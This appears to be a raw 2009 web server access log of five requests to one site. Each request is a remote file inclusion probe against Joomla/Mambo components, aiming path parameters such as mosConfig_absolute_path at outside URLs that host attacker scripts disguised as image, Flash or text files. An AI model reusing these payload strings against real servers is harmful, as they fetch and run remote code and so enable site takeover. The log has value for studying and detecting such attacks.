209.51.133.202 - - [21/Jun/2009:11:50:00 -0700] "GET /logs/access_080201.log%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:50:05 -0700] "GET /logs/access_080901.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:50:19 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20919 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:50:22 -0700] "GET /logs/access_080330.log//?_zb_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:11:51:42 -0700] "GET /logs/access_080121.log%20%20/modules/My_eGallery/index.php?basepath=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
